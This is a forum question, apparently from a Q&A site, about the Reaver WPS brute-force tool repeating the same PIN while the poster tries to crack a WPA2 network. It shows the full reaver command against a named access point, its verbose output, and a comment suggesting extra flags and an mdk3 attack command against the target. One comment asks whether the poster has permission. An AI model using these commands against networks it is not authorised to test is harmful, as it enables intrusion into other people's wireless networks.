# Reaver keeps repeating the same pin on Kali linux

Tags: linux, wifi, kali-linux

I am trying to crack WPA2 PSK via REAVER but the signal strength is under -50db.  **The Signal strength is full**. It tries the same PIN again and again. I have a 2.4 Ghz wireless Adapter. Is this true?

Here is the last REAVER command I entered

```
reaver -i mon0 -b 2C:AB:25:51:F1:CF -d 30 -S -N -vv
  [+] Switching mon0 to channel 1  
  [+] Waiting for beacon from 2C:AB:25:51:F1:CF  
  [+] failed to Associated with 2C:AB:25:51:F1:CF(ESSID: PTCL-BB)  
  [+] Trying pin 12345670  
  [+] Sending EAPOL START request  
  [+] Received identity request  
  [+] Sending identity response                   
  [!] WARNING: Receive timeout occurred          
  [+] Sending WSC NACK  
  [!] WPS transaction failed (code: 0x02), re-trying last pin  
  [+] Trying pin 12345670  
  [+] Sending EAPOL START request  
  [+] Received identity request                 
  [+] Sending identity response  
  [+] Received identity request         
  [+] Sending identity response ^C  
  [+] Nothing done, nothing to save.
```

Comment: Have you tried using the key provided by the operator granting you access to this device?

Comment: IS this is the Problem with Injection packets.

Comment: Use -S and -N (smaller packets for faster encryption and no nacks), and if it still does not work run this followong command for 30-60 seconds: mkd3 mon0 a -a (bssid/mac your trying to crack) -m